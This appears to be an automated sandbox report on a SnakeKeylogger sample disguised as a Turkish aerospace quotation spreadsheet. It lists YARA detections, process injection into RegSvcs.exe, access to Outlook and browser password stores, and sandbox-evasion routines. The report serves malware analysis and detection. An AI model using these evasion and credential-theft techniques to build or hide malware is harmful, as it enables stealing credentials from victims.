Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 7876, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 7960, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack, COVID19.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/2@3/3

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Code function: 0_2_001F37B5 GetLastError,FormatMessageW,

0_2_001F37B5

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_001E10BF AdjustTokenPrivileges,CloseHandle,		0_2_001E10BF
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_001E16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_001E16C3

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Code function: 0_2_001F51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_001F51CD

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Code function: 0_2_0020A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0020A67C

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Code function: 0_2_001F648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

0_2_001F648E

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Code function: 0_2_001842A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_001842A2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

File created: C:\Users\user\AppData\Local\Temp\aut2654.tmp

Jump to behavior

Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegSvcs.exe, 00000002.00000002.2658183432.0000000002ABA000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Virustotal: Detection: 29%
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	ReversingLabs: Detection: 36%

Source: unknown	Process created: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe"
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe"
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe"	Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: windowscodecs.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Static file information: File size 1079296 > 1048576

Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wntdll.pdbUGP source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000003.1450691724.0000000004070000.00000004.00001000.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000003.1450829207.0000000004210000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000003.1450691724.0000000004070000.00000004.00001000.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000003.1450829207.0000000004210000.00000004.00001000.00020000.00000000.sdmp

Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Code function: 0_2_001842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_001842DE

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_001A0A76 push ecx; ret	0_2_001A0A89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00D49C30 push esp; retf 0276h	2_2_00D49D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_050E2DBE pushfd ; retf	2_2_050E2DC1

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	File created: \tekl#u0130f #u0130ste#u011e#u0130 - tusa#u015e t#u00dcrk havacilik uzay sanay#u0130#u0130_xlsx.exe
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	File created: \tekl#u0130f #u0130ste#u011e#u0130 - tusa#u015e t#u00dcrk havacilik uzay sanay#u0130#u0130_xlsx.exe			Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_0019F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_0019F98E
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_00211C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00211C41

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_0-99164

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

API/Special instruction interceptor: Address: 18A19DC

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599436	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598988	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598860	Jump to behavior
